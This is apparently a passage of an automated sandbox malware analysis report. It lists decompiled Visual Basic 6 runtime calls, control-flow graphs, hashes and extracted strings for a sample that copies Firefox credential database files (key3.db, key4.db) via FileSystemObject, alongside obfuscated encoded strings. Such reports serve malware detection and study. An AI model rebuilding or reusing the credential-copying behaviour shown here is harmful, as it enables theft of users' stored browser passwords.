                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00420F38
                                                          • __vbaStrCopy.MSVBVM60 ref: 00420F46
                                                          • __vbaStrMove.MSVBVM60 ref: 00420F65
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00420F7D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00420FBF
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00420FDC
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00421011
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00421018
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00421064
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00421081
                                                          • __vbaStrCat.MSVBVM60(\key4.db,00000000), ref: 004210A2
                                                          • #645.MSVBVM60(00000008,00000000), ref: 004210BE
                                                          • __vbaStrMove.MSVBVM60 ref: 004210C9
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 004210D5
                                                          • #645.MSVBVM60(00000008,00000000), ref: 004210EE
                                                          • __vbaStrMove.MSVBVM60 ref: 004210F9
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00421105
                                                          • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,00000000,00000000), ref: 0042113F
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00421155
                                                          • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000), ref: 0042117F
                                                          • __vbaVarZero.MSVBVM60 ref: 0042118E
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004211E3
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00421200
                                                          • __vbaStrCat.MSVBVM60(\key4.db,00000000), ref: 00421221
                                                          • __vbaStrCat.MSVBVM60(\keyDBPath.db,00673F04), ref: 0042123D
                                                          • __vbaChkstk.MSVBVM60 ref: 00421258
                                                          • __vbaChkstk.MSVBVM60 ref: 0042127B
                                                          • __vbaObjVar.MSVBVM60(?,CopyFile,00000002), ref: 004212B3
                                                          • __vbaLateMemCall.MSVBVM60(00000000), ref: 004212BA
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004212D0
                                                          • __vbaStrCopy.MSVBVM60 ref: 004212F9
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0042130D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042131B
                                                          • __vbaStrMove.MSVBVM60 ref: 0042133A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00421352
                                                          • __vbaStrCat.MSVBVM60(\keyDBPath.db,00673F04), ref: 00421364
                                                          • __vbaStrMove.MSVBVM60 ref: 0042136F
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00421403
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0042140A
                                                          • __vbaStrMove.MSVBVM60 ref: 00421415
                                                          • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 0042144E
                                                          • __vbaFreeVar.MSVBVM60(004216C2), ref: 00421682
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00421691
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042169D
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004216A9
                                                          • __vbaFreeVar.MSVBVM60 ref: 004216B2
                                                          • __vbaFreeStr.MSVBVM60 ref: 004216BB
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 004216D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Error$BoundsGenerate$List$Copy$BstrDestruct$#516#631#645Chkstk$#537#608#632#716CallLateOverflowZero
                                                          • String ID: 29033A0D0100345E0422172A$37380F1522091E257810143A0B1F2E$CopyFile$Scripting.FileSystemObject$\key3.db$\key4.db$\keyDBPath.db$bkKfrLfpVVceV$euoUjhnGpnQxDvQttwCcdwzCOgunCrxjN
                                                          • API String ID: 4274892437-2695434336
                                                          • Opcode ID: 4a8cfb37dafc87ae9aab9f92088b38fb63c1abf269a135699b79c9f0f8529efe
                                                          • Instruction ID: 2866e22a18ea5c61690ed582eb5cfe9d80f456b7f23b2903a5a637e82f7acd54
                                                          • Opcode Fuzzy Hash: 4a8cfb37dafc87ae9aab9f92088b38fb63c1abf269a135699b79c9f0f8529efe
                                                          • Instruction Fuzzy Hash: 2422EA75900218DFDB14CFA4DD84BDEB7B5FB48304F1082AAE50ABB264DB745A89CF58

                                                          Control-flow Graph

                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0043B4AA
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0043B4C0
                                                          • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0043B4CA
                                                          • __vbaStrMove.MSVBVM60(?,00000000), ref: 0043B4D5
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 0043B4E9
                                                            • Part of subcall function 00432D60: __vbaFixstrConstruct.MSVBVM60(00000100,?,6D41A323,6D42D8B1,00402BF8), ref: 00432DAC
                                                            • Part of subcall function 00432D60: __vbaNew2.MSVBVM60(0040B3CC,0043D7AC), ref: 00432DC4
                                                            • Part of subcall function 00432D60: __vbaHresultCheckObj.MSVBVM60(00000000,021D004C,0040B3BC,00000014), ref: 00432DE9
                                                            • Part of subcall function 00432D60: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B924,00000060), ref: 00432E0D
                                                            • Part of subcall function 00432D60: __vbaStrToAnsi.MSVBVM60(?,?,00000001,00000000,00000000,00000000), ref: 00432E20
                                                            • Part of subcall function 00432D60: __vbaSetSystemError.MSVBVM60(00000000), ref: 00432E34
                                                            • Part of subcall function 00432D60: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00432E46
                                                            • Part of subcall function 00432D60: __vbaFreeObj.MSVBVM60 ref: 00432E4E
                                                            • Part of subcall function 00432D60: __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,04000000,00000000), ref: 00432E6D
                                                          • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0043B4F9
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000), ref: 0043B511
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 0043B51E
                                                          • __vbaObjSet.MSVBVM60(?,00000000,?,00000000), ref: 0043B53B
                                                          • __vbaNew2.MSVBVM60(0040B590,?), ref: 0043B551
                                                          • __vbaNew2.MSVBVM60(0040B590,?), ref: 0043B56A
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B580,00000024), ref: 0043B58E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0043B5C9
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0043B5D9
                                                          • __vbaStrCopy.MSVBVM60 ref: 0043B5E3
                                                          • __vbaStrMove.MSVBVM60 ref: 0043B5EE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0043B602
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0043B612
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0043B62A
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 0043B637
                                                          • __vbaObjSet.MSVBVM60(?,00000000,?,00000000), ref: 0043B654
                                                          • __vbaNew2.MSVBVM60(0040B590,?), ref: 0043B66A
                                                          • __vbaNew2.MSVBVM60(0040B590,?), ref: 0043B683
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B580,00000024), ref: 0043B6A7
                                                            • Part of subcall function 0043B130: __vbaChkstk.MSVBVM60(00000000,004030D6,?,?,?,0043B64F,?,00000000), ref: 0043B14E
                                                            • Part of subcall function 0043B130: __vbaOnError.MSVBVM60(00000001,6D42D8B1,6D42D83C,00000000,00000000,004030D6), ref: 0043B17E
                                                            • Part of subcall function 0043B130: __vbaInStr.MSVBVM60(00000000,00407034,?,00000001), ref: 0043B1A1
                                                            • Part of subcall function 0043B130: __vbaNew.MSVBVM60(0040B590,?,00000001), ref: 0043B1B6
                                                            • Part of subcall function 0043B130: __vbaObjSet.MSVBVM60(?,00000000,?,00000001), ref: 0043B1C1
                                                            • Part of subcall function 0043B130: #631.MSVBVM60(?,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 0043B261
                                                            • Part of subcall function 0043B130: __vbaStrMove.MSVBVM60(?,?,?,?,?,00000000), ref: 0043B26C
                                                            • Part of subcall function 0043B130: __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000), ref: 0043B275
                                                            • Part of subcall function 0043B130: __vbaLenBstr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 0043B286
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B580,0000001C), ref: 0043B6DA
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0043B6E4
                                                          • __vbaStrMove.MSVBVM60 ref: 0043B6EF
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 0043B6FB
                                                          • __vbaCastObj.MSVBVM60(00000000,0040B580), ref: 0043B70A
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0043B715
                                                          • __vbaFreeObj.MSVBVM60(0043B774), ref: 0043B764
                                                          • __vbaFreeStr.MSVBVM60 ref: 0043B76D
                                                          Strings
                                                          • 243224056D594B0F1A1C7E1F2F282527331A3B1A011F0845331D2763252824102518010C421E241B2625382F350678050C171A463902643F24323D19, xrefs: 0043B5C1
                                                          • LLFPuWvdxmkPrJ, xrefs: 0043B5DB
                                                          • SpPNKQwBzuVGaGhvnlwxFaZxbOUrNHuL, xrefs: 0043B4C2
                                                          • 18243A3B6B586D091D3930083746180B18, xrefs: 0043B481
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Bstr$CheckHresultListNew2$Copy$#631$#516AnsiError$#537#608#632CastChkstkConstructFixstrSystem
                                                          • String ID: 18243A3B6B586D091D3930083746180B18$243224056D594B0F1A1C7E1F2F282527331A3B1A011F0845331D2763252824102518010C421E241B2625382F350678050C171A463902643F24323D19$LLFPuWvdxmkPrJ$SpPNKQwBzuVGaGhvnlwxFaZxbOUrNHuL
                                                          • API String ID: 506135884-254834455
                                                          • Opcode ID: c7ca0da1a820324615540ce11aef674412e4f0e6bfef45e80b03f87704290eb7
                                                          • Instruction ID: 7d141aa7d3ed1d9da838c4570f9a9e6872d5fd1a0e93dfffe954eccb862b3cd6
                                                          • Opcode Fuzzy Hash: c7ca0da1a820324615540ce11aef674412e4f0e6bfef45e80b03f87704290eb7
                                                          • Instruction Fuzzy Hash: 5AA10AB5D00208ABCB04DFA4DD85DEEBBB9FF58304F50452AE501B3294EB74A949CBA4

                                                          Control-flow Graph

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,?,?,00000000,004030D6), ref: 0042CE7E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0042CEAE
                                                          • __vbaStrCat.MSVBVM60(004055A8,00673F04,?,?,?,?,004030D6), ref: 0042CECD
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0042CEE3
                                                          • __vbaVarMove.MSVBVM60 ref: 0042CEF9
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042CF02
                                                          • __vbaVarTstGt.MSVBVM60(00008008,?), ref: 0042CF2E
                                                          • __vbaInStrVar.MSVBVM60(00000008,00000000,00000008,?,00000001), ref: 0042CF6E
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0042CF75
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042CF85
                                                          • __vbaStrCat.MSVBVM60(004055A8,00673F04), ref: 0042CFAD
                                                          • __vbaVarCat.MSVBVM60(?,?,00000008), ref: 0042CFC9
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0042CFD0
                                                          • __vbaStrMove.MSVBVM60 ref: 0042CFDB
                                                          • __vbaVarAdd.MSVBVM60(0000000A,?,00000008), ref: 0042D004
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0042D00B
                                                          • __vbaStrMove.MSVBVM60 ref: 0042D016
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042D024
                                                          • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?), ref: 0042D049
                                                          • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,004030D6), ref: 0042D060
                                                          • #645.MSVBVM60(0000000A,00000000), ref: 0042D084
                                                          • __vbaVarMove.MSVBVM60 ref: 0042D09A
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042D0A3
                                                          • __vbaFreeVar.MSVBVM60(0042D101), ref: 0042D0FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$FreeMove$#645List$BoolChkstkCopyErrorNull
                                                          • String ID: DC-
                                                          • API String ID: 3297433690-374979773
                                                          • Opcode ID: 26c508b0efb7a3f2dd2bc1a794d53deebec9bbb108115986b4b8cf92c67ff8c4
                                                          • Instruction ID: 1db37241595eed83e49b42a545dd208904091c7f2e3788530489d51feca028ad
                                                          • Opcode Fuzzy Hash: 26c508b0efb7a3f2dd2bc1a794d53deebec9bbb108115986b4b8cf92c67ff8c4
                                                          • Instruction Fuzzy Hash: 0C61E5B5D01208DBDB04DFD0DA48BDEBBB8BB44305F10816AE156B72A4DB785A4ACF64

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6375 434340-4343d5 __vbaRedim call 433fd0 __vbaAryMove __vbaLbound __vbaUbound 6378 4344f2-4344f8 __vbaErrorOverflow 6375->6378 6379 4343db-4343e0 6375->6379 6379->6378 6380 4343e6-4343f1 __vbaAryLock 6379->6380 6381 4343f3-4343f7 6380->6381 6382 434412-434418 __vbaGenerateBoundsError 6380->6382 6381->6382 6383 4343f9-434403 6381->6383 6384 43441b-434467 #644 __vbaAryUnlock call 407cd8 __vbaSetSystemError __vbaAryLock 6382->6384 6385 434405-43440b __vbaGenerateBoundsError 6383->6385 6386 43440e-434410 6383->6386 6389 434469-43446d 6384->6389 6390 434488-43448e __vbaGenerateBoundsError 6384->6390 6385->6386 6386->6384 6389->6390 6391 43446f-434479 6389->6391 6392 434491-4344b3 #644 __vbaAryUnlock 6390->6392 6393 434484-434486 6391->6393 6394 43447b-434481 __vbaGenerateBoundsError 6391->6394 6392->6378 6395 4344b5-4344db __vbaAryDestruct * 2 6392->6395 6393->6392 6394->6393
                                                          APIs
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 0043438E
                                                            • Part of subcall function 00433FD0: #644.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00434010
                                                            • Part of subcall function 00433FD0: __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00434026
                                                            • Part of subcall function 00433FD0: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00434049
                                                            • Part of subcall function 00433FD0: #644.MSVBVM60 ref: 00434055
                                                            • Part of subcall function 00433FD0: __vbaAryLock.MSVBVM60(?,?), ref: 00434061
                                                            • Part of subcall function 00433FD0: __vbaGenerateBoundsError.MSVBVM60 ref: 00434080
                                                            • Part of subcall function 00433FD0: #644.MSVBVM60(00000000), ref: 0043409C
                                                            • Part of subcall function 00433FD0: __vbaAryUnlock.MSVBVM60(?), ref: 004340A8
                                                            • Part of subcall function 00433FD0: __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,00000000,000000FF,00000000,?,00000000,00000000), ref: 004340C8
                                                            • Part of subcall function 00433FD0: __vbaAryMove.MSVBVM60(?,?), ref: 004340DA
                                                          • __vbaAryMove.MSVBVM60(?,?,004030D6), ref: 004343AB
                                                          • __vbaLbound.MSVBVM60(00000001,?), ref: 004343B7
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 004343C5
                                                          • __vbaAryLock.MSVBVM60(?,?), ref: 004343E6
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434405
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434412
                                                          • #644.MSVBVM60(00000000), ref: 00434427
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 00434430
                                                          • __vbaSetSystemError.MSVBVM60(?,?,-00000001,?,?), ref: 0043444E
                                                          • __vbaAryLock.MSVBVM60(?,?), ref: 0043445C
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0043447B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434488
                                                          • #644.MSVBVM60(00000000), ref: 00434497
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 004344A0
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,004344DC), ref: 004344D2
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004344D9
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 004344F2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$#644BoundsGenerate$LockSystemUnlock$DestructMoveRedim$LboundOverflowUbound
                                                          • String ID:
                                                          • API String ID: 797121997-0
                                                          • Opcode ID: 0ff4f9c375fc9a002e708f26a3e64313d63bac8ad865b8ed3364c11f8407c5a4
                                                          • Instruction ID: 88a4fe5662ae132e369218b539252e1528eab087a0082d5dac4710f8b3e33bee
                                                          • Opcode Fuzzy Hash: 0ff4f9c375fc9a002e708f26a3e64313d63bac8ad865b8ed3364c11f8407c5a4
                                                          • Instruction Fuzzy Hash: CA514175D00208AFCB04DFA4D984AEEBBB9FF9C311F10916AE901B7250D775A981CBB4

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6397 403594-4035af #100 6398 4035b8-4035d1 6397->6398 6399 403642-403654 6398->6399 6400 4035d3-403641 6398->6400 6401 4036c3-4036d2 6399->6401 6402 403656-40365f 6399->6402 6400->6399 6404 4036d5-4036ed 6401->6404 6405 403708 6401->6405 6402->6401 6406 4036f0-403707 6404->6406 6407 403722-40372b 6404->6407 6408 40370b-403720 6405->6408 6409 40373c-403763 6405->6409 6406->6405 6407->6409 6408->6407
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #100
                                                          • String ID:
                                                          • API String ID: 1341478452-0
                                                          • Opcode ID: 9e375ff4bd4ff85bb6d024bd5d01d59783b55c289b3890a78a95727a28be94a2
                                                          • Instruction ID: ad94f3499f5236c38dba45d96a2030cf6345d8244fc78b2f63b5b467db205825
                                                          • Opcode Fuzzy Hash: 9e375ff4bd4ff85bb6d024bd5d01d59783b55c289b3890a78a95727a28be94a2
                                                          • Instruction Fuzzy Hash: D14103A644E7C19FD7038B749C662817FB09E13215B1E45EBC4C1CF5E3E22E490AC726
                                                          APIs
                                                          • __vbaOnError.MSVBVM60(00000001,6D4F595C,00000000,6D441654), ref: 00426F07
                                                          • __vbaUbound.MSVBVM60(00000001,00000000), ref: 00426F1E
                                                          • __vbaI2I4.MSVBVM60 ref: 00426F22
                                                          • __vbaAryLock.MSVBVM60(?), ref: 00426F42
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426F66
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426F77
                                                          • #573.MSVBVM60(?,00004011), ref: 00426F97
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 00426FA1
                                                          • __vbaVarMove.MSVBVM60 ref: 00426FB0
                                                          • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 00426FCF
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 00426FE4
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 00426FF0
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427030
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042703E
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00427060
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042706F
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 00427080
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 004270A9
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 004270D1
                                                          • #681.MSVBVM60(?,0000000B,00000003,00000003), ref: 004270FD
                                                          • __vbaI2Var.MSVBVM60(?), ref: 00427107
                                                          • __vbaFreeVarList.MSVBVM60(00000004,0000000B,00000003,00000003,?), ref: 00427122
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0042714B
                                                          • __vbaAryMove.MSVBVM60(?,?,?,0000000B,?,?,00000000,00004002), ref: 004271E0
                                                          • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 0042720A
                                                          • __vbaAryLock.MSVBVM60(?), ref: 00427220
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427251
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427262
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 00427285
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004272D3
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004272E7
